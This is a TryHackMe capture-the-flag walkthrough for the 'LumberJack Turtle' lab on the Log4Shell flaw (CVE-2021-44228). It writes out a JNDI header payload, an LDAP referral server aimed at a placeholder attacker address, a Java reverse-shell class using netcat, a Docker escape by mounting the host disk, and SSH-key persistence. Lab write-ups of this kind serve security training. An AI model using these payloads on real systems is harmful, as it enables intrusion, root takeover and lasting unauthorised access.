LumberJack Turtle – Walkthrough En | TryHackMe – Write-up

No logs, no crime… so says the lumberjack.


Lumberjack turtle is a Tryhackme box and log4j is in the spotlight.

Perfect training to exploit CVE-2021-44228 vulnerability


Command :

nmap -T5 -sV -p-

Web enumeration

Only port 80 is open. We will enumerate the existing directories on the target with Dirb

Command :


We have found a 1st directory, we will see if there is a second on this one.

Command :

dirb -u

New directory found log4j. We will therefore have to exploit this flaw. Before seeing to get into it you have to see if the target is vulnerable.

This GitHub directory allows us to test if the target is vulnerable :

Command :

git clone

cd log4j-scan

pip3 install -r requirements.txt

Target scan :

python3.9 http://

It’s vulnerable… At the same time, we suspected a little…

Little hint lost in the header...

It was well hidden, but it’s worth it. It’s in the header of the /~logs/log4j page.

In the development tools ( f12 ), we can see the hint: X-THM-HINT CVE-2021-44228 against X-Api-Version

Initial foothold - Exploitation

To exploit the flaw, there are several steps to put in place

  • Setting up a server that will respond to the ldap request (LDAP Referral Server)
  • creating a code shell in java
  • exploit sharing via an http server
  • setting up a netcat listener
  • execute the malicious request.

LDAP Referral Server

You must first download this directory GitHub

Command :

git clone

cd marshalec

mvn clean package -DskipTests

Setting up the server :

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit

Creating a shellcode in java

public class Exploit {

    static {

        try {

            java.lang.Runtime.getRuntime().exec("nc 9999 -e /bin/bash");

        } catch (Exception e) {






javac -source 8 -target 8

Exploit sharing via a http server

python3.9 -m http.server

Setting up a netcat listener

nc -nlvp 9999

Everything is ready !!!!

Execute the malicious request.

curl -X GET -H 'X-Api-Version: ${jndi:ldap://\}'

Escalade de privilège

We arrive on a shell, which cannot be upgraded. In any case, we are on a root account but in a content.

Flag 1

The 1st flag is at this location: /opt/

Escape from docker

As for the Hamlet box (put the link), you have to go to /dev and see which disks are present.

Command :

cd /dev

ls -al | grep disk

Then, we have to mount xvda1

Command :

mkdir /mnt/xvda1

mount /dev/xvda1 /mnt/xvda1

Once mounted, we have access to the entire system as root.

Flag 2

The 2nd flag is more difficult to find. It is easy to miss. You have to see the folder called «…»

Done !!!

Connection SSH - Root

It is possible to connect in ssh. Once the xvda1 volume is mounted, it is possible to add a public key in the authorized_keys file.

On Kali, you have to create a private/public key pair

Command :


Copy of the key :

echo ‘key here ‘ >> authorized_keys


That’s all folks

Thank you for taking the time to come to the site to read this Write-Up

I hope he has more for you and teaches you new things.

Feel free to leave a comment or share this article.